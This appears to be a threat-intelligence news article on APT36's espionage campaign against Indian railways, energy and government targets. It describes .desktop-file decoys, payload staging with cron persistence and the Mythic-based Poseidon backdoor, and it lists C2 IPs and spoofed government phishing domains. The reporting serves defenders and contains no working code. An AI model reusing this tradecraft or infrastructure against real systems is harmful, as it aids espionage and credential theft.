APT36 Escalates Cyber-Espionage on India: Poseidon Backdoor Targets Railways, Oil & Government

APT36—also known as Transparent Tribe—has long been linked to Pakistan-backed cyber-espionage operations. But as uncovered in a detailed new report from Hunt Intelligence, the group has now expanded its targeting and fine-tuned its techniques. The report highlights two new desktop-based infection chains, an elaborate phishing infrastructure, and the deployment of a powerful backdoor dubbed Poseidon, which is built on the open-source Mythic command and control framework.

“APT36 has expanded its focus to include Indian railway systems, oil and gas infrastructure, and the Ministry of External Affairs,” the report states.

The scope of the campaign is broad and persistent, with infrastructure still active as of mid-July 2025.

Hunt researchers identified that the initial attack vectors are .desktop files disguised as PDF documents—a form of malware delivery that blends social engineering with native OS capabilities.

“These files serve as decoys, appearing harmless to the user but executing scripts in the background that download and run malicious files.”

The malicious scripts, embedded within these .desktop files, retrieve payloads from remote servers, place them in hidden directories such as /dev/shm/, and establish persistence using cron jobs. The payloads use names like emacs-bin, crond-98, or p7zip-full to blend in with legitimate binaries.

Variant 1 connects to a single C2 server at 209.38.203.53 and hosts a decoy document on Google Drive, executing a streamlined compromise sequence.

Variant 2 is more resilient, relying on two redundant C2 servers (165.232.114.63 and 165.22.251.224) and a decoy named National Anubhav Scheme-2025.pdf—clearly targeting users interested in Indian employment schemes.

“This setup provides redundancy, allowing communication to continue if one server is taken offline, and increases complexity for defenders.”

Once access is established, APT36 deploys Poseidon, a backdoor that:

• Maintains persistent access
• Harvests credentials
• Enables lateral movement

“Poseidon, developed using the open-source Mythic command and control framework and written in Go, supports multiple operating systems.”

C2 servers for Poseidon were identified as 178.128.204.138 and 64.227.189.57—both hosted on DigitalOcean and linked via port 7443, which was running active Mythic C2 services.

Researchers also detected 352 additional active servers with Mythic-related TLS metadata, suggesting that APT36 is not alone in leveraging this framework.

APT36 is simultaneously operating a phishing campaign that impersonates Indian military and government domains. Some examples include:

• drdo.gov.in.nominationdrdo.report
• mod.gov.in.defencepersonnel.support
• iaf.nic.in.ministryofdefenceindia.org

“A common tactic is the use of familiar-looking subdomains combined with misleading top-level domains (TLDs) such as .report, .support, .digital, and .link.”

The domains resolve to IPs hosted by AlexHost—a provider frequently associated with malicious infrastructure. In one case, a fake DRDO login page was used to capture credentials under the guise of a letter titled MoS Defence Letter to DRDO Secy and Scientist.

Related Posts:

• Poseidon Stealer Malware Targets Mac Users via Fake DeepSeek Site
• Don’t Fall for the Bait: Poseidon Stealer Masquerades as Sopha AI
• APT36 Suspected in India Gov Spoofing Phishing with ClickFix Tactics
• APT36 Unleashes Linux Malware: Transparent Tribe Targets Indian Government with Go-Based Espionage Tools
• Transparent Tribe APT Group’s New Arsenal: Mythic Poseidon, Linux, and C2 Takedown

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy